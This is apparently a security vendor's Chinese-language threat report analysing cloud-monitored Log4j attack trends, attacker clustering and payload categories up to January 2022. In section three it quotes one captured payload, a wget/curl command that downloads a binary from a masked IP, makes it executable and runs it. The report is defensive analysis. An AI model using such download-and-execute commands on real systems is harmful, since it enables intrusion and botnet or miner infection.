安全知識圖譜 | Log4j事件雲端資料分析

Log4j漏洞攻擊影響範圍深遠，為了有效觀測、識別相關漏洞的攻擊情況，綠盟科技透過監測與跟蹤分析雲端資料，洞察事件攻擊態勢，挖掘攻擊模式，加速關鍵攻擊事件的定位與研判。以下為基於綠盟雲監測進行分析得到的資料，時間截止至2022年1月4日零時。

一、 態勢觀測：Log4j攻擊趨勢

從圖1可以看出，綠盟雲端監測到的Log4j攻擊事件在漏洞曝光之初即呈現爆炸式增長的態勢。隨著政策響應、防護策略與攻擊目標、攻擊技戰術的博弈，攻擊事件爆發初期出現波動但持續增長，於12月19日達到攻擊頂峰，隨後呈現整體下降的態勢。從攻擊源的地理位置分佈來看，前期以國內攻擊源為主，12月14日後，國外攻擊源大幅增加，並在後續時間段內保持與國內攻擊源一致的攻擊規模和攻擊數量趨勢。

圖1  Log4j攻擊事件國內外攻擊源數量趨勢

此外，在綠盟雲端的監測節點中，檢測到Log4j攻擊的裝置佔比在第一週快速升高，並在第二週後趨於平穩。截至2022年1月4日，已累計有近17%的防護站點監測到該型別攻擊。

圖2   檢測到Log4j攻擊的雲端節點數量趨勢

二、 團伙行為觀測

雲端監控的優勢在於能夠透過全域性視角觀測攻擊者、攻擊團伙的跨域攻擊行為，以及整體的行為模式演化。圖3給出了取樣資料中，部署在不同位置監測裝置（紫色節點）監控下的攻擊者（源IP）關聯關係。可以看出有較為明顯的團簇現象。一方面，少量受害者站點受到了大規模攻擊源的集中攻擊；另一方面，攻擊團伙利用大規模攻擊基礎設施，對指定的受害者群體發起了大規模的掃描與攻擊行為。

圖3  Log4j攻擊事件跨域行為

三、 事件精細分診

為了細粒度觀測Log4j攻擊事件的攻擊手法，實現在大規模事件下的事件準確研判，綠盟科技基於資料分析方法，對事件進行細粒度分診。首先，透過已知指紋特徵過濾提取已知攻擊行為模式，進而對事件載荷進行取樣、清洗、向量化、降維，並實現聚類分析，對所有事件進行模式壓縮。

圖4  Log4j攻擊載荷聚類視覺化

透過降維聚類，可以對大部分同質攻擊載荷進行壓縮，整體壓縮率可達95%。聚類將全部事件分為幾十種不同類別，圖5分別列出了所有事件中佔比最高的幾個攻擊模式類別。

圖5  Log4j Top5攻擊模式類別趨勢

對事件取樣並進行整體分診，剔除掉一些典型的掃描事件類簇，對不同統計模式的事件進行數量統計和標準化，各個聚類簇和關鍵字命中類別的每日攻擊數量趨勢如圖7所示。可以看到，具有明顯特徵的大規模攻擊者及其攻擊行為（載荷層次）隨著時間推進而變化。例如，某些利用公共基礎設施的（如keyword1部分，awv******.cn公共dnslog平臺）攻擊利用行為在2021年12月12日後大幅減少，近期有所反彈。此外，如包含攻擊載荷的cluster3攻擊行為集中出現，其攻擊載荷為：

wget http://152.*.*.150/py; curl -O http://152.*.*.150/py; chmod 777 py; ./py rce.x86

圖6的峰值幅度對各個類別的資料自身規模進行歸一化，以更好的展示每一類攻擊載荷在長時間週期內的攻擊強度分佈。可以看出整體上隨著時間的推進，綠盟雲檢測到的攻擊載荷模式隨之演變。有些攻擊樣本及載荷，在整個時間週期內有持續性；大部分攻擊載荷模式，在不同的時間段出現，說明有不同攻擊手法、攻擊意圖的攻擊者湧現和消逝。

圖6  Log4j Top5攻擊模式類別趨勢

透過對上述資料的快速分診分析，我們發現絕大多數攻擊事件為漏洞掃描行為。除此之外，也定位到大量有實際漏洞利用動作的攻擊載荷，涉及下載挖礦指令碼、mirai殭屍網路傳播等型別。一些典型的攻擊載荷如圖7所示。

圖7  Log4j攻擊載荷摘要

四、 安全知識圖譜

如圖8所示，從安全知識圖譜的分析中可以發現，圖譜中已涵蓋log4j的最新漏洞測試POCs，或利用指令碼(Exploit-DB)和依賴log4j的元件或產品，以及國內外漏洞通告情況、緩解方案、漏洞可能關聯的潛在攻擊模式等。安全知識圖譜基於圖關聯統計分析log4j影響範圍和風險面狀況，同時產出log4j的關聯知識，自動生成檢測規則並應用在安全掃描器或資產掃描中，進一步深度安全自查，有效緩解企業安全風險管理問題。

圖8  從安全知識圖譜中分析Log4j風險

五、總結

在雲端大資料平臺上，我們能夠觀測攻擊事件的整體態勢和攻擊行為關聯行為模式，並以系統、全域性的視角審視攻擊團伙行為，分析攻擊模式演變。基於雲端知識圖譜與智慧分診技術，能夠加速攻擊技戰術的研判，並生成高置信度的威脅情報，支撐高階威脅的精準和快速定位。